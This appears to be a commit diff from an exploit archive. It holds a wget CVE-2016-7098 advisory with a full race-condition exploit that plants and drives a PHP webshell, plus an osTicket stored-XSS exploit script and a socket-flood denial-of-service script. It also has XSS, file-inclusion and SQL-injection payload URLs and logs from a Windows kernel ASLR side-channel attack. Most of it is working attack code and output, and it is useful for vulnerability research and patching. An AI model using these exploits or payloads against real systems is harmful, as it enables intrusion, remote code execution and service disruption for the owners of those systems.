https://www.gnu.org/software/wget/
III. INTRODUCTION
-------------------------
GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode,
is affected by a Race Condition vulnerability that might allow remote attackers
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system.
Depending on the application / download directory, this could potentially lead
to other vulnerabilities such as code execution etc.
IV. DESCRIPTION
-------------------------
When wget is used in recursive/mirroring mode, according to the manual it can
take the following access list options:
"Recursive Accept/Reject Options:
-A acclist --accept acclist
-R rejlist --reject rejlist
Specify comma-separated lists of file name suffixes or patterns to accept or
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in
an element of acclist or rejlist, it will be treated as a pattern, rather
than a suffix."
These can for example be used to only download JPG images.
It was however discovered that when a single file is requested with recursive
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process.
This can be observed in the output below:
# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: â˜test.phpâ
15:05:46 (27.3 B/s) - â˜test.phpâ saved [52]
Removing test.php since it should be rejected.
FINISHED
Although wget deletes the file at the end of the download process, this creates
a race condition as an attacker with control over the URL/remote server could
intentionally slow down the download process so that they had a chance to make
use of the malicious file before it gets deleted.
It is very easy to win the race as the file only gets deleted after the HTTP
connection is terminated. The attacker could therefore keep the connection open
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.
V. PROOF OF CONCEPT EXPLOIT
------------------------------
Here is a simple vulnerable PHP web application that uses wget to download
images from a user-provided server/URL:
---[ image_importer.php ]---
<?php
// Vulnerable webapp [image_importer.php]
// Uses wget to import user images from provided site URL
// It only accepts JPG files (-A wget option).
if ( isset($_GET['imgurl']) ) {
$URL = escapeshellarg($_GET['imgurl']);
} else {
die("imgurl parameter missing");
}
if ( !file_exists("image_uploads") ) {
mkdir("image_uploads");
}
// Download user JPG images into /image_uploads directory
system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>
----------------------------
For example:
https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg
will cause wget to upload logo.jpg file into:
https://victimsvr/images_uploads/logo.jpg
The wget access list (-A) is to ensure that only .jpg files get uploaded.
However due to the wget race condition vulnerability an attacker could use
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.
---[ wget-race-exploit.py ]---
'''
#!/usr/bin/env python
#
# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget.
#
# Adjust target URL (WEBSHELL_URL) before executing.
#
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
#
import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys
HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80
PAYLOAD='''
<?php
//our webshell
system($_GET["cmd"]);
system("touch /tmp/wgethack");
?>
'''
# Webshell URL to be requested before the connection is closed
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"
# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Send the payload on GET request
print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(PAYLOAD)
print "\n[+] PHP webshell payload was sent.\n"
# Wait for the file to be flushed to disk on remote host etc.
print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
time.sleep(2)
# Request uploaded webshell
print "[+} File '" + self.path + "' should be saved by now :)\n"
print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
print "[+} Command result: "
print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()
print "[+} All done. Closing HTTP connection...\n"
# Connection will be closed on request handler return
return
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT
handler.serve_forever()
'''
------------------------------
If the attacker run this exploit on their server ('attackersver') and pointed
the vulnerable script image_importer.php at it via URL:
https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php
The attacker will see output similar to:
root@attackersvr:~# ./wget-race-exploit.py
Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
CVE-2016-7098
Dawid Golunski
https://legalhackers.com
[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...
[+] Got connection from wget requesting /webshell.php via GET :)
victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -
[+] PHP webshell payload was sent.
[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...
[+} File '/webshell.php' should be saved by now :)
[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id
[+} Command result:
uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)
[+} All done. Closing HTTP connection...
VI. BUSINESS IMPACT
-------------------------
The vulnerability might allow remote servers to bypass intended wget access list
restrictions to temporarily store a malicious file on the server.
In certain cases, depending on the context wget command was used in and download
path, this issue could potentially lead to other vulnerabilities such as
script execution as shown in the PoC section.
VII. SYSTEMS AFFECTED
-------------------------
Wget < 1.18
VIII. SOLUTION
-------------------------
Update to latest version of wget 1.18 or apply patches provided by the vendor.
IX. REFERENCES
-------------------------
https://legalhackers.com
https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py
https://www.gnu.org/software/wget/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098
https://security-tracker.debian.org/tracker/CVE-2016-7098
http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html
http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
24.11.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''

View file

@ -4,5 +4,4 @@ A cross-site scripting vulnerability affects Clever Copy. This issue is due to a
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/calendar.php?mth=3&yr=2006"><script src=
"http://www.example.com/dev/injection/js.js"></script>
http://www.example.com/calendar.php?mth=3&yr=2006"><script src="http://www.example.com/dev/injection/js.js"></script>

View file

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/28861/info
Aterr is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
The issues affect Aterr 0.9.1; other versions might also be affected.
http://www.example.com/path/include/functions.inc.php?class=[Local File]
http://www.example.com/path/include/common.inc.php?file=[Local File]

View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28957/info
miniBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
miniBB 2.2a is vulnerable; other versions may also be affected.
http://www.example.com/bb_admin.php?action=searchusers2&whatus=" /> <script>alert(document.cookie)</script>&searchus=id

View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/39905/info
eZoneScripts Apartment Search Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/productdemos/ApartmentSearch/listtest.php?r=-1 union select 0,user()--

168
platforms/php/webapps/40826.py Executable file
View file

@ -0,0 +1,168 @@
# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS.
# Date: 24-11-2016
# Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ]
# Software Link: http://osticket.com/
# Vendor: Osticket
"""
==============
DESCRIPTION
==============
**osTicket** is a widely-used open source support ticket system. It seamlessly
integrates inquiries created via email, phone and web-based forms into a
simple easy-to-use multi-user web interface. Manage, organize and archive
all your support requests and responses in one place while providing your
customers with accountability and responsiveness they deserve.
(copy of Osticket - README.md)
=======================
VULNERABILITY DETAILS
=======================
file `osticket/upload/bootstrap.php` contains this
snippet of code (line 337-340):
...
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
// Take the left-most item for X-Forwarded-For
$_SERVER['REMOTE_ADDR'] = trim(array_pop(
explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])));
....
The $_SERVER['REMOTE_ADDR'] value gets overrided with the `X-Forwarded-For` header value,
at this point, it is not a vulnerability but...
file `osticket/upload/include/class.osticket.php` line 309-315 :
...
//Save log based on system log level settings.
$sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() '
.',title='.db_input(Format::sanitize($title, true))
.',log_type='.db_input($loglevel[$level])
.',log='.db_input(Format::sanitize($message, false))
.',ip_address='.db_input($_SERVER['REMOTE_ADDR']);
db_query($sql, false);
....
Everytime when a csrf attack is dettected (checking `X_CSRFTOKEN` header or the post parameter `__CSRFToken__`),
Osticket saves into database the user controled value $_SERVER['REMOTE_ADDR'] even if it has an invalid format.
Finally the XSS is triggered when a user who can see the system logs like an administrator, visits
the /scp/logs.php URI. It happens because osticket does not encode the output of the data stored into the database.
The code responsible for lanching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php`
line 142...
...
<td><?php echo $row['ip_address']; ?></td>
...
So...
An attacker can make an HTTP request with a header `X-Forwarded-For` containing the XSS payload
with an invalid CSRF token to the login interface waiting for an administrator to view the logs and trigger the XSS.
================
DEMONSTRATION
================
Demo video: https://www.youtube.com/watch?v=lx_WlL89F70
The demo also show a low severity XSS vulnerability in the helpdesk name/title of osticket.
================
REFERENCES
================
https://github.com/osTicket/osTicket/releases
https://github.com/osTicket/osTicket/releases/tag/v1.9.15
X-Forwarded-For XSS:
https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631
heldeskt name/tile XSS:
https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37
================
MITIGATIONS
================
update to version 1.9.15 or later
================
CREDITS
================
Vulnerability discovered by Joaquin Ramirez Martinez
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos
https://twitter.com/rammarj
================
TIMELINE
================
13-07-2016 - Vulnerability found
19-09-2016 - Osticket knew the flaws
01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released)
24-11-2016 - Public disclosure.
"""
import urllib
import urllib2
from optparse import OptionParser
options = OptionParser(usage='python %prog [options]', description='Stored XSS')
options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost')
options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /')
options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>'
, help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"')
banner = """
======================================================
OSTICKET
"The most popular ticketing system in the world"
Stored XSS
by i0-sec (Joaquin R. M.)
======================================================
"""
def main():
opts,args = options.parse_args()
print(banner)
server = opts.target
path = opts.path
body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""})
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload}
url = server+path+"/scp/login.php" #default login interface URI for OSTICKET
print('[+] Connecting to '+server+path)
req = urllib2.Request(url, body, headers)
try:
print('[+] Sending payload... ')
response = urllib2.urlopen(req)
html = response.read()
except Exception, e:
pass
print '[+] Payload sent.'
print '[+] Completed.\n'
if __name__ == '__main__':
main()

22
platforms/windows/dos/40825.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service
# Date: 2016-11-25
# Exploit Author: Peter Baris
# Vendor Homepage: www.remoteutilities.com
# Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip
# Version: 6.3.0.6 - (other version are also affected below version 6.5 beta 3)
# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2
# After the notification, the company released a fix in version 6.5 beta 3
# On Windows 7 - the software refuses connections after execution.
# On Windows 2008 R2 it caused 100% CPU usage and occasional server crash when 1 core was assigned
#!/usr/bin/python
import socket
counter=0
while (counter <= 5000):
counter=counter+1
print(counter)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('<host address>',5650))
s.close()

866
platforms/windows/local/40823.txt Executable file
View file

@ -0,0 +1,866 @@
Complete Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip
Presentation:
https://www.exploit-db.com/docs/40822.pdf
I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
Requirements
Intel Processor (Haswell or newer)
Windows 10 x64
Usage
Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:
C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
+] Setting thread affinity to CPU 0
+] Getting all the potential PML4 SelfRef
+] Mapping a page oracle
+] Allocating probing target pages...
Allocation 0: 0000020E339D0000
Allocation 1: 0000020E339E0000
Allocation 2: 0000020E339F0000
Allocation 3: 0000020E33A00000
Allocation 4: 0000020E33A10000
--------------------------
+] Check that Unammped and Mapped values are consistent across several executions!
--------------------------
Unmapped Initial: 256.683746
Mapped Initial: 203.692978
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.440018
Mapped: 202.827560
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
+] PTE FFFF810804020100 looks mapped! - Time: 204.740097
+] Removing 102 from initial array and pushing it into final array
Potential SelfRef: FFFF81C0E0703818
+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921
+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726
+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874
Time difference exceed for ffff818804020100, retrying...
+] PTE FFFF818804020100 looks mapped! - Time: 209.071213
+] Removing 103 from initial array and pushing it into final array
Time difference exceed for ffff824120904820, retrying...
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642
Time difference exceed for ffff82010719cf00, retrying...
+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593
+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344
+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862
+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263
+] PTE FFFF820804020100 looks mapped! - Time: 204.585739
+] Removing 104 from initial array and pushing it into final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003
Time difference exceed for ffff8341a0d06830, retrying...
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657
+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697
+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016
+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504
+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126
+] PTE FFFF830804020100 looks mapped! - Time: 193.314758
+] Removing 106 from initial array and pushing it into final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973
+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693
+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097
+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660
+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816
+] PTE FFFF838804020100 looks mapped! - Time: 204.008743
+] Removing 107 from initial array and pushing it into final array
Time difference exceed for ffff89c4e2713898, retrying...
Time difference exceed for ffff8bc5e2f178b8, retrying...
Time difference exceed for ffff8c46231188c0, retrying...
Unmapped Initial: 248.508636
Mapped Initial: 207.139847
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 236.360733
Mapped: 195.650040
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363
Potential SelfRef: FFFF81C0E0703818
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393
Time difference exceed for ffff81810719cf00, retrying...
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645
+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724
+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167
+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160
+] PTE FFFF818804020100 looks mapped! - Time: 195.728439
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF81C0E0703818 - Index: 103
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff818000000000
-] Erasing 103 from final array
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759
+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019
+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364
+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826
+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143
+] PTE FFFF820804020100 looks mapped! - Time: 198.158585
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff820000000000
-] Erasing 104 from final array
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823
+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525
+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040
+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254
+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034
+] PTE FFFF830804020100 looks mapped! - Time: 197.613953
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff830000000000
-] Erasing 106 from final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380
Time difference exceed for ffff83810719cf00, retrying...
Time difference exceed for ffff83810719cf00, retrying...
Unmapped Initial: 232.123840
Mapped Initial: 196.420654
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 234.845581
Mapped: 187.862518
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938
+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784
+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733
+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182
+] PTE FFFF810804020100 looks mapped! - Time: 199.812225
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff810000000000
Time difference exceed for ffff810000000000, retrying...
-] Erasing 102 from final array
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 230.247162
Mapped Initial: 198.023987
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 235.923035
Mapped: 191.605301
--------------------------
Time difference exceed for ffff83c1e0f07838, retrying...
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 258.041046
Mapped Initial: 210.309753
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 238.757538
Mapped: 203.896240
--------------------------
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102
+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836
+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333
+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445
+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763
+] PTE FFFF838804020100 looks mapped! - Time: 203.243607
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff838000000000
-] Erasing 107 from final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221
+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138
+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006
+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943
+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639
+] PTE FFFF828804020100 looks mapped! - Time: 196.754044
+] Removing 105 from initial array and pushing it into final array
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff90c864321908, retrying...
Unmapped Initial: 257.754272
Mapped Initial: 207.903702
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.145935
Mapped: 207.792923
--------------------------
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092
+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715
+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614
+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837
+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796
+] PTE FFFF828804020100 looks mapped! - Time: 208.765045
PML4e: FFFF82C160B05828 - Index: 105
KNOWN_UNMAPPED PTE: ffff828000000000
-] Erasing 105 from final array
-] Removing 100 as it seems to be unmapped
-] Removing 101 as it seems to be unmapped
-] Removing 108 as it seems to be unmapped
-] Removing 109 as it seems to be unmapped
-] Removing 10a as it seems to be unmapped
-] Removing 10b as it seems to be unmapped
-] Removing 10c as it seems to be unmapped
-] Removing 10d as it seems to be unmapped
Time difference exceed for ffff8743a1d0e870, retrying...
-] Removing 10e as it seems to be unmapped
-] Removing 10f as it seems to be unmapped
-] Removing 110 as it seems to be unmapped
Time difference exceed for ffff88c462311888, retrying...
-] Removing 111 as it seems to be unmapped
-] Removing 112 as it seems to be unmapped
-] Removing 113 as it seems to be unmapped
Time difference exceed for ffff8a45229148a0, retrying...
-] Removing 114 as it seems to be unmapped
-] Removing 115 as it seems to be unmapped
-] Removing 116 as it seems to be unmapped
-] Removing 117 as it seems to be unmapped
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffe8f47a3d1e88, retrying...
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379
+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694
+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502
+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920
+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059
+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246
+] Removing 1ec from initial array and pushing it into final array
Unmapped Initial: 233.678802
Mapped Initial: 214.496124
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 250.585373
Mapped: 213.339661
--------------------------
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
PML4e: FFFFF67B3D9ECF60 - Index: 1ec
KNOWN_UNMAPPED PTE: fffff60000000000
Real PML4 SelfRef Found: fffff67b3d9ecf60
Left in Potential Array: ffff8c46231188c0
Left in Potential Array: ffff8cc6633198c8
Left in Potential Array: ffff8d46a351a8d0
Left in Potential Array: ffff8dc6e371b8d8
Left in Potential Array: ffff8e472391c8e0
Left in Potential Array: ffff8ec763b1d8e8
Left in Potential Array: ffff8f47a3d1e8f0
Left in Potential Array: ffff8fc7e3f1f8f8
Left in Potential Array: ffff904824120900
Left in Potential Array: ffff90c864321908
Left in Potential Array: ffff9148a4522910
Left in Potential Array: ffff91c8e4723918
Left in Potential Array: ffff924924924920
Left in Potential Array: ffff92c964b25928
Left in Potential Array: ffff9349a4d26930
Left in Potential Array: ffff93c9e4f27938
Left in Potential Array: ffff944a25128940
Left in Potential Array: ffff94ca65329948
Left in Potential Array: ffff954aa552a950
Left in Potential Array: ffff95cae572b958
Left in Potential Array: ffff964b2592c960
Left in Potential Array: ffff96cb65b2d968
Left in Potential Array: ffff974ba5d2e970
Left in Potential Array: ffff97cbe5f2f978
Left in Potential Array: ffff984c26130980
Left in Potential Array: ffff98cc66331988
Left in Potential Array: ffff994ca6532990
Left in Potential Array: ffff99cce6733998
Left in Potential Array: ffff9a4d269349a0
Left in Potential Array: ffff9acd66b359a8
Left in Potential Array: ffff9b4da6d369b0
Left in Potential Array: ffff9bcde6f379b8
Left in Potential Array: ffff9c4e271389c0
Left in Potential Array: ffff9cce673399c8
Left in Potential Array: ffff9d4ea753a9d0
Left in Potential Array: ffff9dcee773b9d8
Left in Potential Array: ffff9e4f2793c9e0
Left in Potential Array: ffff9ecf67b3d9e8
Left in Potential Array: ffff9f4fa7d3e9f0
Left in Potential Array: ffff9fcfe7f3f9f8
Left in Potential Array: ffffa05028140a00
Left in Potential Array: ffffa0d068341a08
Left in Potential Array: ffffa150a8542a10
Left in Potential Array: ffffa1d0e8743a18
Left in Potential Array: ffffa25128944a20
Left in Potential Array: ffffa2d168b45a28
Left in Potential Array: ffffa351a8d46a30
Left in Potential Array: ffffa3d1e8f47a38
Left in Potential Array: ffffa45229148a40
Left in Potential Array: ffffa4d269349a48
Left in Potential Array: ffffa552a954aa50
Left in Potential Array: ffffa5d2e974ba58
Left in Potential Array: ffffa6532994ca60
Left in Potential Array: ffffa6d369b4da68
Left in Potential Array: ffffa753a9d4ea70
Left in Potential Array: ffffa7d3e9f4fa78
Left in Potential Array: ffffa8542a150a80
Left in Potential Array: ffffa8d46a351a88
Left in Potential Array: ffffa954aa552a90
